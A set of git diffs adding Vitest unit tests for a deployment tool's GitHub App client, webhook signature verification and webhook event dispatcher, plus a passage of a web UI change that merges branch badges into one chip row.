+describe('GitHubAppClient', () => {
+  describe('generateAppJwt', () => {
+    it('produces a valid RS256 JWT that the public key verifies', () => {
+      const { publicKey, privateKey } = freshKeyPair();
+      const client = new GitHubAppClient({ appId: '12345', privateKey });
+      const jwt = client.generateAppJwt(1_700_000_000);
+
+      const parts = jwt.split('.');
+      expect(parts).toHaveLength(3);
+      const [headerB64, payloadB64, signatureB64] = parts;
+
+      const header = JSON.parse(Buffer.from(headerB64, 'base64url').toString('utf-8'));
+      expect(header.alg).toBe('RS256');
+      expect(header.typ).toBe('JWT');
+
+      const payload = JSON.parse(Buffer.from(payloadB64, 'base64url').toString('utf-8'));
+      expect(payload.iss).toBe('12345');
+      expect(payload.iat).toBe(1_700_000_000 - 30);
+      expect(payload.exp).toBe(1_700_000_000 + 540);
+
+      const verifier = createVerify('RSA-SHA256');
+      verifier.update(`${headerB64}.${payloadB64}`);
+      verifier.end();
+      const sig = Buffer.from(signatureB64, 'base64url');
+      expect(verifier.verify(publicKey, sig)).toBe(true);
+    });
+  });
+
+  describe('getInstallationToken', () => {
+    it('caches the token until it approaches expiry', async () => {
+      const { privateKey } = freshKeyPair();
+      let calls = 0;
+      const fetchImpl = scripted([
+        {
+          match: /\/app\/installations\/42\/access_tokens$/,
+          response: { token: 'ghs_tokenA', expires_at: new Date(Date.now() + 3_600_000).toISOString() },
+        },
+      ]);
+      const wrapped: FetchLike = async (url, init) => {
+        calls++;
+        return fetchImpl(url, init);
+      };
+      const client = new GitHubAppClient({ appId: '1', privateKey, fetchImpl: wrapped });
+
+      const t1 = await client.getInstallationToken(42);
+      const t2 = await client.getInstallationToken(42);
+      expect(t1).toBe('ghs_tokenA');
+      expect(t2).toBe('ghs_tokenA');
+      expect(calls).toBe(1);
+    });
+
+    it('throws GitHubAppError with status on HTTP failure', async () => {
+      const { privateKey } = freshKeyPair();
+      const fetchImpl = scripted([
+        {
+          match: /access_tokens$/,
+          response: { message: 'Bad credentials' },
+          status: 401,
+        },
+      ]);
+      const client = new GitHubAppClient({ appId: '1', privateKey, fetchImpl });
+      await expect(client.getInstallationToken(42)).rejects.toMatchObject({
+        code: 'installation_token_failed',
+        status: 401,
+      });
+    });
+  });
+
+  describe('createCheckRun', () => {
+    it('POSTs to /repos/:owner/:repo/check-runs with expected body', async () => {
+      const { privateKey } = freshKeyPair();
+      let receivedBody: any = null;
+      const fetchImpl: FetchLike = async (url, init) => {
+        if (String(url).includes('access_tokens')) {
+          return {
+            ok: true,
+            status: 200,
+            statusText: 'OK',
+            json: async () => ({ token: 'tkn', expires_at: new Date(Date.now() + 3_600_000).toISOString() }),
+            text: async () => '',
+          };
+        }
+        if (String(url).includes('/check-runs')) {
+          receivedBody = JSON.parse(init?.body as string);
+          return {
+            ok: true,
+            status: 201,
+            statusText: 'Created',
+            json: async () => ({ id: 9999, html_url: 'https://github.com/x/y/runs/9999' }),
+            text: async () => '',
+          };
+        }
+        throw new Error(`unmatched ${url}`);
+      };
+      const client = new GitHubAppClient({ appId: '1', privateKey, fetchImpl });
+      const result = await client.createCheckRun(1, 'octo', 'repo', {
+        name: 'CDS Deploy',
+        headSha: 'abc1234',
+        status: 'in_progress',
+        detailsUrl: 'https://cds.example/x',
+        externalId: 'feature-main',
+        output: { title: 'Deploying…', summary: 'Starting' },
+      });
+      expect(result.id).toBe(9999);
+      expect(receivedBody.name).toBe('CDS Deploy');
+      expect(receivedBody.head_sha).toBe('abc1234');
+      expect(receivedBody.status).toBe('in_progress');
+      expect(receivedBody.details_url).toBe('https://cds.example/x');
+      expect(receivedBody.external_id).toBe('feature-main');
+      expect(receivedBody.output.title).toBe('Deploying…');
+    });
+  });
+
+  describe('updateCheckRun', () => {
+    it('PATCHes to the correct URL', async () => {
+      const { privateKey } = freshKeyPair();
+      let patchedUrl: string | null = null;
+      const fetchImpl: FetchLike = async (url, init) => {
+        if (String(url).includes('access_tokens')) {
+          return {
+            ok: true,
+            status: 200,
+            statusText: 'OK',
+            json: async () => ({ token: 't', expires_at: new Date(Date.now() + 3_600_000).toISOString() }),
+            text: async () => '',
+          };
+        }
+        patchedUrl = String(url);
+        expect(init?.method).toBe('PATCH');
+        return { ok: true, status: 200, statusText: 'OK', json: async () => ({}), text: async () => '' };
+      };
+      const client = new GitHubAppClient({ appId: '1', privateKey, fetchImpl });
+      await client.updateCheckRun(1, 'octo', 'repo', 42, {
+        status: 'completed',
+        conclusion: 'success',
+        output: { title: 'Done', summary: 'all good' },
+      });
+      expect(patchedUrl).toBe('https://api.github.com/repos/octo/repo/check-runs/42');
+    });
+  });
+});
+
+describe('verifyWebhookSignature', () => {
+  const secret = 'It\'s a Secret to Everybody';
+  const body = Buffer.from('Hello, World!');
+
+  function hmacHex(b: Buffer, s: string): string {
+    return createHmac('sha256', s).update(b).digest('hex');
+  }
+
+  it('accepts a correct signature', () => {
+    const header = `sha256=${hmacHex(body, secret)}`;
+    expect(verifyWebhookSignature(body, header, secret)).toBe(true);
+  });
+
+  it('rejects a wrong signature', () => {
+    const wrong = hmacHex(body, 'different-secret');
+    expect(verifyWebhookSignature(body, `sha256=${wrong}`, secret)).toBe(false);
+  });
+
+  it('rejects a missing prefix', () => {
+    const header = hmacHex(body, secret);
+    expect(verifyWebhookSignature(body, header, secret)).toBe(false);
+  });
+
+  it('rejects a signature of wrong length', () => {
+    expect(verifyWebhookSignature(body, 'sha256=abc', secret)).toBe(false);
+  });
+
+  it('rejects undefined signature', () => {
+    expect(verifyWebhookSignature(body, undefined, secret)).toBe(false);
+  });
+
+  it('rejects non-hex characters', () => {
+    // 64 chars but contains a `z`
+    const badHex = 'z' + hmacHex(body, secret).slice(1);
+    expect(verifyWebhookSignature(body, `sha256=${badHex}`, secret)).toBe(false);
+  });
+});
+
+describe('buildInstallUrl', () => {
+  it('returns null when app slug is missing', () => {
+    expect(buildInstallUrl(undefined)).toBeNull();
+  });
+  it('produces a standard install URL', () => {
+    expect(buildInstallUrl('cds-deploy')).toBe('https://github.com/apps/cds-deploy/installations/new');
+  });
+  it('appends state param when provided', () => {
+    expect(buildInstallUrl('cds-deploy', 'proj:abc')).toBe(
+      'https://github.com/apps/cds-deploy/installations/new?state=proj%3Aabc',
+    );
+  });
+});

--- a/cds/tests/services/github-webhook-dispatcher.test.ts
+++ b/cds/tests/services/github-webhook-dispatcher.test.ts
@@ -278,4 +278,106 @@ describe('GitHubWebhookDispatcher', () => {
       expect(result.action).toBe('ignored-event');
     });
   });
+
+  describe('pull_request events', () => {
+    beforeEach(() => {
+      stateService.addProject({
+        id: 'p1',
+        slug: 'proj',
+        name: 'Proj',
+        kind: 'git',
+        createdAt: new Date().toISOString(),
+        updatedAt: new Date().toISOString(),
+        githubRepoFullName: 'octocat/repo',
+        githubInstallationId: 42,
+      });
+      stateService.addBranch({
+        id: 'proj-feature',
+        projectId: 'p1',
+        branch: 'feature',
+        worktreePath: '/tmp/wt',
+        services: {},
+        status: 'running',
+        createdAt: new Date().toISOString(),
+      });
+    });
+
+    it('returns pr-comment-posted on opened and stamps prNumber on branch', async () => {
+      const d = buildDispatcher();
+      const result = await d.handle('pull_request', {
+        action: 'opened',
+        number: 99,
+        pull_request: {
+          number: 99,
+          state: 'open',
+          head: { ref: 'feature', sha: 'abc' },
+          base: { ref: 'main' },
+          html_url: 'https://github.com/octocat/repo/pull/99',
+          title: 'Great feature',
+        },
+        repository: { full_name: 'octocat/repo' },
+        installation: { id: 42 },
+      });
+      expect(result.action).toBe('pr-comment-posted');
+      expect(result.branchId).toBe('proj-feature');
+      const branch = stateService.getBranch('proj-feature');
+      expect(branch!.githubPrNumber).toBe(99);
+    });
+
+    it('returns pr-branch-stopped on closed with stopRequest', async () => {
+      const d = buildDispatcher();
+      const result = await d.handle('pull_request', {
+        action: 'closed',
+        number: 99,
+        pull_request: {
+          number: 99,
+          state: 'closed',
+          merged: true,
+          head: { ref: 'feature', sha: 'abc' },
+          base: { ref: 'main' },
+          html_url: 'https://github.com/octocat/repo/pull/99',
+          title: 'Great feature',
+        },
+        repository: { full_name: 'octocat/repo' },
+      });
+      expect(result.action).toBe('pr-branch-stopped');
+      expect(result.stopRequest).toEqual({ branchId: 'proj-feature' });
+    });
+
+    it('ignores synchronize (handled by companion push)', async () => {
+      const d = buildDispatcher();
+      const result = await d.handle('pull_request', {
+        action: 'synchronize',
+        number: 99,
+        pull_request: {
+          number: 99,
+          state: 'open',
+          head: { ref: 'feature', sha: 'abc' },
+          base: { ref: 'main' },
+          html_url: 'x',
+          title: 't',
+        },
+        repository: { full_name: 'octocat/repo' },
+      });
+      expect(result.action).toBe('ignored-event');
+    });
+
+    it('ignores pull_request for unlinked repo', async () => {
+      const d = buildDispatcher();
+      const result = await d.handle('pull_request', {
+        action: 'opened',
+        number: 1,
+        pull_request: {
+          number: 1,
+          state: 'open',
+          head: { ref: 'x', sha: 'y' },
+          base: { ref: 'main' },
+          html_url: 'z',
+          title: 't',
+        },
+        repository: { full_name: 'stranger/repo' },
+      });
+      expect(result.action).toBe('ignored-no-project');
+    });
+  });
 });

--- a/cds/tests/services/github-webhook-dispatcher.test.ts
+++ b/cds/tests/services/github-webhook-dispatcher.test.ts
@@ -1,0 +1,281 @@
+/**
+ * Unit tests for GitHubWebhookDispatcher.
+ *
+ * Uses an in-memory StateService + a stub WorktreeService + a stub
+ * IShellExecutor. These tests focus on the branching logic of the
+ * dispatcher — they don't actually clone git repos or talk to GitHub.
+ */
+
+import { describe, it, expect, beforeEach } from 'vitest';
+import fs from 'node:fs';
+import path from 'node:path';
+import os from 'node:os';
+import { StateService } from '../../src/services/state.js';
+import { WorktreeService } from '../../src/services/worktree.js';
+import type { IShellExecutor, CdsConfig } from '../../src/types.js';
+import { GitHubWebhookDispatcher } from '../../src/services/github-webhook-dispatcher.js';
+
+class MockShell implements IShellExecutor {
+  calls: Array<{ cmd: string; cwd?: string }> = [];
+  async exec(command: string, options?: { cwd?: string }) {
+    this.calls.push({ cmd: command, cwd: options?.cwd });
+    return { stdout: '', stderr: '', exitCode: 0 };
+  }
+}
+
+class MockWorktree extends WorktreeService {
+  createdWorktrees: Array<{ repoRoot: string; branch: string; targetDir: string }> = [];
+  override async create(repoRoot: string, branch: string, targetDir: string) {
+    this.createdWorktrees.push({ repoRoot, branch, targetDir });
+  }
+}
+
+function buildConfig(overrides?: Partial<CdsConfig>): CdsConfig {
+  return {
+    repoRoot: '/tmp/repo',
+    worktreeBase: '/tmp/wt',
+    masterPort: 9900,
+    workerPort: 5500,
+    dockerNetwork: 'cds',
+    portStart: 10001,
+    sharedEnv: {},
+    jwt: { secret: 'x'.repeat(32), issuer: 'cds' },
+    mode: 'standalone',
+    executorPort: 9901,
+    ...overrides,
+  };
+}
+
+describe('GitHubWebhookDispatcher', () => {
+  let tmp: string;
+  let stateService: StateService;
+  let shell: MockShell;
+  let worktree: MockWorktree;
+
+  beforeEach(() => {
+    tmp = fs.mkdtempSync(path.join(os.tmpdir(), 'cds-whd-'));
+    stateService = new StateService(path.join(tmp, 'state.json'), tmp);
+    stateService.load();
+    shell = new MockShell();
+    worktree = new MockWorktree(shell);
+  });
+
+  function buildDispatcher(): GitHubWebhookDispatcher {
+    return new GitHubWebhookDispatcher({
+      stateService,
+      worktreeService: worktree,
+      shell,
+      config: buildConfig(),
+    });
+  }
+
+  describe('ping', () => {
+    it('acknowledges ping events', async () => {
+      const d = buildDispatcher();
+      const result = await d.handle('ping', { zen: 'hi' });
+      expect(result.action).toBe('ignored-ping');
+    });
+  });
+
+  describe('push events', () => {
+    it('returns ignored-no-project when no project matches', async () => {
+      const d = buildDispatcher();
+      const result = await d.handle('push', {
+        ref: 'refs/heads/main',
+        after: 'abc123',
+        repository: { id: 1, full_name: 'octocat/missing' },
+      });
+      expect(result.action).toBe('ignored-no-project');
+      expect(result.deployRequest).toBeUndefined();
+    });
+
+    it('ignores tag pushes', async () => {
+      const d = buildDispatcher();
+      const result = await d.handle('push', {
+        ref: 'refs/tags/v1',
+        after: 'abc',
+        repository: { id: 1, full_name: 'octocat/repo' },
+      });
+      expect(result.action).toBe('ignored-non-branch');
+    });
+
+    it('ignores delete pushes', async () => {
+      const d = buildDispatcher();
+      const result = await d.handle('push', {
+        ref: 'refs/heads/main',
+        deleted: true,
+        repository: { id: 1, full_name: 'octocat/repo' },
+      });
+      expect(result.action).toBe('ignored-delete');
+    });
+
+    it('honours autoDeploy=false', async () => {
+      stateService.addProject({
+        id: 'p1',
+        slug: 'proj',
+        name: 'Proj',
+        kind: 'git',
+        createdAt: new Date().toISOString(),
+        updatedAt: new Date().toISOString(),
+        githubRepoFullName: 'octocat/repo',
+        githubInstallationId: 42,
+        githubAutoDeploy: false,
+      });
+      const d = buildDispatcher();
+      const result = await d.handle('push', {
+        ref: 'refs/heads/feature',
+        after: 'abc123',
+        repository: { id: 1, full_name: 'octocat/repo' },
+      });
+      expect(result.action).toBe('ignored-auto-deploy-off');
+      expect(result.deployRequest).toBeUndefined();
+    });
+
+    it('creates a new branch + records deploy request on push', async () => {
+      stateService.addProject({
+        id: 'p1',
+        slug: 'proj',
+        name: 'Proj',
+        kind: 'git',
+        createdAt: new Date().toISOString(),
+        updatedAt: new Date().toISOString(),
+        githubRepoFullName: 'octocat/repo',
+        githubInstallationId: 42,
+      });
+      const d = buildDispatcher();
+      const result = await d.handle('push', {
+        ref: 'refs/heads/feature-x',
+        after: 'deadbeef',
+        repository: { id: 1, full_name: 'octocat/repo' },
+      });
+      expect(result.action).toBe('branch-created');
+      expect(result.branchId).toBe('proj-feature-x');
+      expect(result.deployRequest).toEqual({ branchId: 'proj-feature-x', commitSha: 'deadbeef' });
+
+      const branch = stateService.getBranch('proj-feature-x');
+      expect(branch).toBeDefined();
+      expect(branch!.githubRepoFullName).toBe('octocat/repo');
+      expect(branch!.githubCommitSha).toBe('deadbeef');
+      expect(branch!.githubInstallationId).toBe(42);
+      expect(worktree.createdWorktrees).toHaveLength(1);
+    });
+
+    it('refreshes an existing branch (no new worktree)', async () => {
+      stateService.addProject({
+        id: 'p1',
+        slug: 'proj',
+        name: 'Proj',
+        kind: 'git',
+        createdAt: new Date().toISOString(),
+        updatedAt: new Date().toISOString(),
+        githubRepoFullName: 'octocat/repo',
+        githubInstallationId: 42,
+      });
+      stateService.addBranch({
+        id: 'proj-main',
+        projectId: 'p1',
+        branch: 'main',
+        worktreePath: '/tmp/wt/p1/proj-main',
+        services: {},
+        status: 'idle',
+        createdAt: new Date().toISOString(),
+      });
+      const d = buildDispatcher();
+      const result = await d.handle('push', {
+        ref: 'refs/heads/main',
+        after: 'cafebabe',
+        repository: { id: 1, full_name: 'octocat/repo' },
+      });
+      expect(result.action).toBe('branch-refreshed');
+      expect(result.branchId).toBe('proj-main');
+      expect(worktree.createdWorktrees).toHaveLength(0);
+      const branch = stateService.getBranch('proj-main');
+      expect(branch!.githubCommitSha).toBe('cafebabe');
+    });
+
+    it('matches repo full names case-insensitively', async () => {
+      stateService.addProject({
+        id: 'p1',
+        slug: 'proj',
+        name: 'Proj',
+        kind: 'git',
+        createdAt: new Date().toISOString(),
+        updatedAt: new Date().toISOString(),
+        githubRepoFullName: 'OctoCat/Repo',
+        githubInstallationId: 42,
+      });
+      const d = buildDispatcher();
+      const result = await d.handle('push', {
+        ref: 'refs/heads/main',
+        after: 'ab',
+        repository: { id: 1, full_name: 'octocat/repo' },
+      });
+      expect(result.action).toBe('branch-created');
+    });
+  });
+
+  describe('installation_repositories removed', () => {
+    it('detaches a removed repo link from matching project', async () => {
+      stateService.addProject({
+        id: 'p1',
+        slug: 'proj',
+        name: 'Proj',
+        kind: 'git',
+        createdAt: new Date().toISOString(),
+        updatedAt: new Date().toISOString(),
+        githubRepoFullName: 'octocat/repo',
+        githubInstallationId: 42,
+      });
+      const d = buildDispatcher();
+      await d.handle('installation_repositories', {
+        action: 'removed',
+        installation: { id: 42 },
+        repositories_removed: [{ full_name: 'octocat/repo' }],
+      });
+      const updated = stateService.getProject('p1')!;
+      expect(updated.githubRepoFullName).toBeUndefined();
+      expect(updated.githubInstallationId).toBeUndefined();
+    });
+  });
+
+  describe('check_run rerequested', () => {
+    it('queues a redeploy when the branch exists', async () => {
+      stateService.addProject({
+        id: 'p1',
+        slug: 'proj',
+        name: 'Proj',
+        kind: 'git',
+        createdAt: new Date().toISOString(),
+        updatedAt: new Date().toISOString(),
+        githubRepoFullName: 'octocat/repo',
+        githubInstallationId: 42,
+      });
+      stateService.addBranch({
+        id: 'proj-main',
+        projectId: 'p1',
+        branch: 'main',
+        worktreePath: '/tmp/x',
+        services: {},
+        status: 'running',
+        createdAt: new Date().toISOString(),
+      });
+      const d = buildDispatcher();
+      const result = await d.handle('check_run', {
+        action: 'rerequested',
+        check_run: { id: 1, head_sha: 'ca55e77e', external_id: 'proj-main', check_suite: { id: 9 } },
+        repository: { full_name: 'octocat/repo' },
+        installation: { id: 42 },
+      });
+      expect(result.action).toBe('check-run-requeued');
+      expect(result.deployRequest).toEqual({ branchId: 'proj-main', commitSha: 'ca55e77e' });
+    });
+  });
+
+  describe('unhandled events', () => {
+    it('returns ignored-event', async () => {
+      const d = buildDispatcher();
+      const result = await d.handle('release', { action: 'published' });
+      expect(result.action).toBe('ignored-event');
+    });
+  });
+});

--- a/cds/tests/services/github-webhook-dispatcher.test.ts
+++ b/cds/tests/services/github-webhook-dispatcher.test.ts
@@ -82,7 +82,7 @@ describe('GitHubWebhookDispatcher', () => {
       const d = buildDispatcher();
       const result = await d.handle('push', {
         ref: 'refs/heads/main',
-        after: 'abc123',
+        after: 'abc123def456789012345678901234567890aaaa',
         repository: { id: 1, full_name: 'octocat/missing' },
       });
       expect(result.action).toBe('ignored-no-project');
@@ -93,7 +93,7 @@ describe('GitHubWebhookDispatcher', () => {
       const d = buildDispatcher();
       const result = await d.handle('push', {
         ref: 'refs/tags/v1',
-        after: 'abc',
+        after: 'abc1234567890abcdef1234567890abcdef12345',
         repository: { id: 1, full_name: 'octocat/repo' },
       });
       expect(result.action).toBe('ignored-non-branch');
@@ -124,7 +124,7 @@ describe('GitHubWebhookDispatcher', () => {
       const d = buildDispatcher();
       const result = await d.handle('push', {
         ref: 'refs/heads/feature',
-        after: 'abc123',
+        after: 'abc123def456789012345678901234567890aaaa',
         repository: { id: 1, full_name: 'octocat/repo' },
       });
       expect(result.action).toBe('ignored-auto-deploy-off');
@@ -145,17 +145,17 @@ describe('GitHubWebhookDispatcher', () => {
       const d = buildDispatcher();
       const result = await d.handle('push', {
         ref: 'refs/heads/feature-x',
-        after: 'deadbeef',
+        after: 'deadbeef01234567890abcdef1234567890abcde',
         repository: { id: 1, full_name: 'octocat/repo' },
       });
       expect(result.action).toBe('branch-created');
       expect(result.branchId).toBe('proj-feature-x');
-      expect(result.deployRequest).toEqual({ branchId: 'proj-feature-x', commitSha: 'deadbeef' });
+      expect(result.deployRequest).toEqual({ branchId: 'proj-feature-x', commitSha: 'deadbeef01234567890abcdef1234567890abcde' });
 
       const branch = stateService.getBranch('proj-feature-x');
       expect(branch).toBeDefined();
       expect(branch!.githubRepoFullName).toBe('octocat/repo');
-      expect(branch!.githubCommitSha).toBe('deadbeef');
+      expect(branch!.githubCommitSha).toBe('deadbeef01234567890abcdef1234567890abcde');
       expect(branch!.githubInstallationId).toBe(42);
       expect(worktree.createdWorktrees).toHaveLength(1);
     });
@@ -183,14 +183,14 @@ describe('GitHubWebhookDispatcher', () => {
       const d = buildDispatcher();
       const result = await d.handle('push', {
         ref: 'refs/heads/main',
-        after: 'cafebabe',
+        after: 'cafebabe01234567890abcdef1234567890abcde',
         repository: { id: 1, full_name: 'octocat/repo' },
       });
       expect(result.action).toBe('branch-refreshed');
       expect(result.branchId).toBe('proj-main');
       expect(worktree.createdWorktrees).toHaveLength(0);
       const branch = stateService.getBranch('proj-main');
-      expect(branch!.githubCommitSha).toBe('cafebabe');
+      expect(branch!.githubCommitSha).toBe('cafebabe01234567890abcdef1234567890abcde');
     });
 
     it('matches repo full names case-insensitively', async () => {
@@ -207,7 +207,7 @@ describe('GitHubWebhookDispatcher', () => {
       const d = buildDispatcher();
       const result = await d.handle('push', {
         ref: 'refs/heads/main',
-        after: 'ab',
+        after: 'ab12345678901234567890123456789012345678',
         repository: { id: 1, full_name: 'octocat/repo' },
       });
       expect(result.action).toBe('branch-created');

--- a/cds/tests/services/github-webhook-dispatcher.test.ts
+++ b/cds/tests/services/github-webhook-dispatcher.test.ts
@@ -273,8 +273,10 @@ describe('GitHubWebhookDispatcher', () => {
 
   describe('unhandled events', () => {
     it('returns ignored-event', async () => {
+      // Use an event we genuinely don't handle (not in the case switch).
+      // `release` now has its own acknowledgement handler.
       const d = buildDispatcher();
-      const result = await d.handle('release', { action: 'published' });
+      const result = await d.handle('deployment_status', { action: 'created' });
       expect(result.action).toBe('ignored-event');
     });
   });
@@ -378,6 +380,183 @@ describe('GitHubWebhookDispatcher', () => {
         repository: { full_name: 'stranger/repo' },
       });
       expect(result.action).toBe('ignored-no-project');
+    });
+  });
+
+  describe('issue_comment slash commands', () => {
+    beforeEach(() => {
+      stateService.addProject({
+        id: 'p1', slug: 'proj', name: 'Proj', kind: 'git',
+        createdAt: new Date().toISOString(), updatedAt: new Date().toISOString(),
+        githubRepoFullName: 'octocat/repo', githubInstallationId: 42,
+      });
+      stateService.addBranch({
+        id: 'proj-feat', projectId: 'p1', branch: 'feat',
+        worktreePath: '/tmp/wt', services: {}, status: 'running',
+        createdAt: new Date().toISOString(),
+        githubPrNumber: 7,
+      });
+    });
+
+    async function fireComment(body: string) {
+      const d = buildDispatcher();
+      return d.handle('issue_comment', {
+        action: 'created',
+        comment: { id: 99, body, user: { login: 'alice' } },
+        issue: { number: 7, pull_request: { url: 'x', html_url: 'y' } },
+        repository: { full_name: 'octocat/repo' },
+        installation: { id: 42 },
+      });
+    }
+
+    it('parses /cds redeploy + resolves branch from PR number', async () => {
+      const r = await fireComment('/cds redeploy');
+      expect(r.action).toBe('slash-command-invoked');
+      expect(r.slashCommand?.command).toBe('redeploy');
+      expect(r.slashCommand?.branchId).toBe('proj-feat');
+      expect(r.slashCommand?.commenter).toBe('alice');
+    });
+
+    it('parses /cds stop', async () => {
+      const r = await fireComment('/cds stop');
+      expect(r.slashCommand?.command).toBe('stop');
+    });
+
+    it('parses /cds logs', async () => {
+      const r = await fireComment('/cds logs');
+      expect(r.slashCommand?.command).toBe('logs');
+    });
+
+    it('parses /cds help', async () => {
+      const r = await fireComment('/cds help');
+      expect(r.slashCommand?.command).toBe('help');
+    });
+
+    it('defaults bare /cds to help', async () => {
+      const r = await fireComment('/cds');
+      expect(r.slashCommand?.command).toBe('help');
+    });
+
+    it('maps unknown verbs to help with arg', async () => {
+      const r = await fireComment('/cds foobar');
+      expect(r.slashCommand?.command).toBe('unknown');
+      expect(r.slashCommand?.arg).toBe('foobar');
+    });
+
+    it('ignores non-slash comments', async () => {
+      const r = await fireComment('looks good to me');
+      expect(r.action).toBe('ignored-event');
+    });
+
+    it('ignores comment on non-PR issue (no pull_request field)', async () => {
+      const d = buildDispatcher();
+      const r = await d.handle('issue_comment', {
+        action: 'created',
+        comment: { id: 1, body: '/cds redeploy', user: { login: 'alice' } },
+        issue: { number: 99 },
+        repository: { full_name: 'octocat/repo' },
+      });
+      expect(r.action).toBe('ignored-event');
+    });
+  });
+
+  describe('delete event (branch deletion on GitHub)', () => {
+    beforeEach(() => {
+      stateService.addProject({
+        id: 'p1', slug: 'proj', name: 'Proj', kind: 'git',
+        createdAt: new Date().toISOString(), updatedAt: new Date().toISOString(),
+        githubRepoFullName: 'octocat/repo', githubInstallationId: 42,
+      });
+      stateService.addBranch({
+        id: 'proj-feat', projectId: 'p1', branch: 'feat',
+        worktreePath: '/tmp/wt', services: {}, status: 'running',
+        createdAt: new Date().toISOString(),
+      });
+    });
+
+    it('returns branch-deleted with stopRequest for branch ref_type', async () => {
+      const d = buildDispatcher();
+      const r = await d.handle('delete', {
+        ref: 'feat',
+        ref_type: 'branch',
+        repository: { full_name: 'octocat/repo' },
+      });
+      expect(r.action).toBe('branch-deleted');
+      expect(r.stopRequest).toEqual({ branchId: 'proj-feat' });
+    });
+
+    it('ignores tag deletions', async () => {
+      const d = buildDispatcher();
+      const r = await d.handle('delete', {
+        ref: 'v1.0.0',
+        ref_type: 'tag',
+        repository: { full_name: 'octocat/repo' },
+      });
+      expect(r.action).toBe('ignored-event');
+    });
+
+    it('ignores delete for branch CDS never tracked', async () => {
+      const d = buildDispatcher();
+      const r = await d.handle('delete', {
+        ref: 'never-existed',
+        ref_type: 'branch',
+        repository: { full_name: 'octocat/repo' },
+      });
+      expect(r.action).toBe('ignored-event');
+    });
+  });
+
+  describe('repository event (rename / delete / transfer)', () => {
+    beforeEach(() => {
+      stateService.addProject({
+        id: 'p1', slug: 'proj', name: 'Proj', kind: 'git',
+        createdAt: new Date().toISOString(), updatedAt: new Date().toISOString(),
+        githubRepoFullName: 'octocat/repo', githubInstallationId: 42,
+      });
+    });
+
+    it('detaches link on repository.deleted', async () => {
+      const d = buildDispatcher();
+      const r = await d.handle('repository', {
+        action: 'deleted',
+        repository: { full_name: 'octocat/repo', name: 'repo', owner: { login: 'octocat' } },
+      });
+      expect(r.action).toBe('repo-detached');
+      const p = stateService.getProject('p1')!;
+      expect(p.githubRepoFullName).toBeUndefined();
+    });
+
+    it('detaches link on repository.renamed using changes.repository.name.from', async () => {
+      const d = buildDispatcher();
+      const r = await d.handle('repository', {
+        action: 'renamed',
+        repository: { full_name: 'octocat/new-name', name: 'new-name', owner: { login: 'octocat' } },
+        changes: { repository: { name: { from: 'repo' } } },
+      });
+      expect(r.action).toBe('repo-renamed');
+      const p = stateService.getProject('p1')!;
+      expect(p.githubRepoFullName).toBeUndefined();
+    });
+
+    it('ignores repository events with no linked project', async () => {
+      const d = buildDispatcher();
+      const r = await d.handle('repository', {
+        action: 'deleted',
+        repository: { full_name: 'stranger/thing', name: 'thing', owner: { login: 'stranger' } },
+      });
+      expect(r.action).toBe('ignored-event');
+    });
+  });
+
+  describe('release event', () => {
+    it('acknowledges release events for future implementation', async () => {
+      const d = buildDispatcher();
+      const r = await d.handle('release', {
+        action: 'published',
+        release: { tag_name: 'v1.0.0', name: '1.0', html_url: 'x', draft: false, prerelease: false },
+        repository: { full_name: 'octocat/repo' },
+      });
+      expect(r.action).toBe('release-acknowledged');
     });
   });
 });

--- a/cds/web/app.js
+++ b/cds/web/app.js
@@ -3625,16 +3625,26 @@ function renderBranches() {
               </button>
             </span>
           </div>
-          ${b.pinnedCommit ? `<div class="branch-card-row2">
-            <span class="pinned-commit-badge" onclick="event.stopPropagation(); checkoutCommit('${esc(b.id)}', '', true, '')" title="已固定到历史提交 ${esc(b.pinnedCommit)}，点击恢复最新"><svg width="10" height="10" viewBox="0 0 16 16" fill="currentColor" style="vertical-align:-1px"><path d="M4.456.734a1.75 1.75 0 012.826.504l.613 1.327a3.081 3.081 0 002.084 1.707l2.454.584c1.332.317 1.8 1.972.832 2.94L11.06 9.695a.75.75 0 01-.19.436l-4.552 4.552a.75.75 0 01-1.06-1.06l4.305-4.305L7.307 7.13A4.581 4.581 0 005.03 4.929L4.416 3.6A.25.25 0 004.01 3.49L2.606 4.893a.25.25 0 00.104.407l1.328.613a4.581 4.581 0 012.204 2.277l.248.538a.75.75 0 01-1.36.628l-.248-.538a3.081 3.081 0 00-1.483-1.532L2.07 6.773C.783 6.19.381 4.602 1.3 3.682L2.703 2.28A1.75 1.75 0 014.456.734z"/></svg> ${esc(b.pinnedCommit)}</span>
-          </div>` : ''}
-          ${b.githubCommitSha && b.githubRepoFullName ? `<div class="branch-card-row2">
-            <a class="branch-gh-badge" href="https://github.com/${esc(b.githubRepoFullName)}/commit/${esc(b.githubCommitSha)}" target="_blank" rel="noopener" onclick="event.stopPropagation()" title="来自 GitHub webhook — 点击查看 commit: ${esc(b.githubCommitSha)}" style="display:inline-flex;align-items:center;gap:5px;padding:2px 8px;border-radius:10px;background:rgba(96,165,250,0.1);border:1px solid rgba(96,165,250,0.3);color:#60a5fa;font-size:10px;font-weight:600;text-decoration:none;font-family:var(--font-mono,monospace)">
-              <svg width="10" height="10" viewBox="0 0 16 16" fill="currentColor"><path d="M8 0C3.58 0 0 3.58 0 8c0 3.54 2.29 6.53 5.47 7.59.4.07.55-.17.55-.38 0-.19-.01-.82-.01-1.49-2.01.37-2.53-.49-2.69-.94-.09-.23-.48-.94-.82-1.13-.28-.15-.68-.52-.01-.53.63-.01 1.08.58 1.23.82.72 1.21 1.87.87 2.33.66.07-.52.28-.87.51-1.07-1.78-.2-3.64-.89-3.64-3.95 0-.87.31-1.59.82-2.15-.08-.2-.36-1.02.08-2.12 0 0 .67-.21 2.2.82.64-.18 1.32-.27 2-.27.68 0 1.36.09 2 .27 1.53-1.04 2.2-.82 2.2-.82.44 1.1.16 1.92.08 2.12.51.56.82 1.27.82 2.15 0 3.07-1.87 3.75-3.65 3.95.29.25.54.73.54 1.48 0 1.07-.01 1.93-.01 2.2 0 .21.15.46.55.38A8.013 8.013 0 0016 8c0-4.42-3.58-8-8-8z"/></svg>
-              from GitHub · ${esc(String(b.githubCommitSha).slice(0, 7))}
-            </a>
-          </div>` : ''}
-          ${portBadgesHtml ? `<div class="branch-card-ports">${portBadgesHtml}</div>` : ''}
+          ${(() => {
+            // Unified chip row — combines GitHub source chip + port badges +
+            // pinned-commit badge into ONE wrappable flex row. Keeps the
+            // card compact and visually consistent between branches that
+            // have/don't have a GitHub source.
+            //
+            // GitHub chip is just an icon + 7-char SHA (no "from GitHub"
+            // label — the GitHub logo is self-explanatory and the SHA
+            // tells you "this branch was triggered by a webhook push").
